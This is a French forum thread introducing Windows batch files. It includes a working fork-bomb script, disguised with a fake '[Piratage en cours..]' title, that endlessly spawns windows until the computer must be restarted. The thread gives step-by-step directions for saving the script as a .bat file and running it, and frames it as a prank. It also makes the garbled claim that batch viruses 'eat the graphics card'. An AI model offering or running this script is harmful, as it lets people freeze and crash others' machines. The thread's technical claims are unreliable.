Follow along with the video below to see how to install our site as a web app on your home screen.
Note: This feature may not be available in some browsers.
Le Batch est " expliqué pour les noob " comme l'utilitaire principale des commande basique de windows , vous pouvez faire énormément de chose sympa et marrante avec , attention sachez que des virus sont crées en batch puis mis en .exe pour les faire ressembler à des programmes normaux , ils sont en faites des méchants virus qui boufferont la carte graphique de votre ordinateur et qui pourront faire très mal , ne vous faites pas avoir.
( Edité par mon grand frère de 22 ans , Codeur Multi-langages )
Pour récupérer un batch il vous suffit de copier le code ( venant d'un forum .. d'un tuto ) de le coller sur le bloc note et d'enregistrer sous le format .bat à la place de .txt
Tiens un code plutôt sympa pour faire surchauffer un ordinateur ( pas de virus , coller le texte vous même sur le .txt et enrengistrer en .bat)
Merci de bien vouloir redémarré votre ordinateur si vous voulez pas de bobo !
Code:@ echo off title [Piratage en cours..] mode *** cols=999 lines=999 color 0a :sulfus start start start start goto sulfus
Une fois ce .bat lancé , des millions de fenêtres vont s'ouvrir et vous faire horriblement lagger ! Redémarrage obligatoire x)
( Enlevez l'espace entre @ et echo , c'est un bug du forum^^)
Moi je préfère le vbs ^^Oui c'est sur que maintenant ya beaucoup mieux , même moi j'arrive a faire beaucoup plus puissant et beaucoup plus marrant , quand j'aurais le temps j'éditerais un peu ce vieux topic merci![]()
NonLes .bat c'est un peu pour les " noob " voulant hack ect, mais c'est marrant![]()
Je sais t'inquiète, t'excite pasNon
Ça sert pas que pour hacker
Est en bat/vbs il a plein de truc utile
Ok ^^Je sais t'inquiète, t'excite pas![]()